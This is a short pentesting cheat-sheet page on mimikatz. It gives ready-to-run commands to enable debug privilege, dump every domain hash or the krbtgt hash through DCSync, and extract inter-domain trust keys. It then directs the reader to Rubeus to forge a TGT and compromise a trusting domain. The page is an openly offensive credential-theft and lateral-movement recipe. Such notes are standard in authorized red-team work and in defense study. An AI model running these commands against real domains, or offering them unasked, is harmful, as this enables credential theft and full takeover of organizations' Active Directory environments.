# mimikatz.exe
A little [tool](https://github.com/gentilkiwi/mimikatz) to play with Windows security.

## Get ready to work with mimikatz
Before running mimikatz, you'll want to launch a command prompt with admin rights, then:
```
mimikatz.exe
privilege::debug
```

## Extract all hashes from a domain controller (when you have DA rights)

```
lsadump::dcsync /domain:domain.com /all /csv
```

## Extract hashes of a single user
``` 
lsadump::dcsync /domain:domain.com /user:krbtgt
```

## Extract domain trust keys
For example, if you have pwn3d domain2.com and want to extract trust keys for domain1.com, [first look up the victim domain's GUID](/cmd/Windows/get-adobject), and then you can do this from your mimikatz prompt where you have full rights:

```
lsadump::dcsync /guid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx }/domain:domain2.com
```

The output will look something like:

```
<snip>
[OUT] DOMAIN1.COM -> DOMAIN2.COM
* 1/1/2024 7:11 a.m. - CLEAR - ....<snip>
....</snip>
aes256_hmac: BLAHBLAH
aes128_hmac: BLAHBLAH
rc4_hmac_nt: IMPORTANT!
</snip>
```

Take the `rc4_hmac_nt` value and then use [Rubeus](/pentesting/Internal/rubeus) to get a TGT for DOMAIN.COM.

More good stuff about abusing domain trusts [here](https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/) and I found [this example](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-trust-accountusd-accessing-resources-on-a-trusted-domain-from-a-trusting-domain) to be *excellent* for walking you through a pwnage situation where you've got DA on DOMAIN2.COM and want to pwn DOMAIN1.COM via a trust relationship.

:::tip
One time mimikatz threw an error (unfortunately I didn't write it down) about not being able to extract *krbtgt* account, but after reading [this article](https://notes.qazeer.io/active-directory/post_exploitation-ntds_dit_dumping) I learned I had to use the `/domain` flag to specify the domain I was dumping from.
:::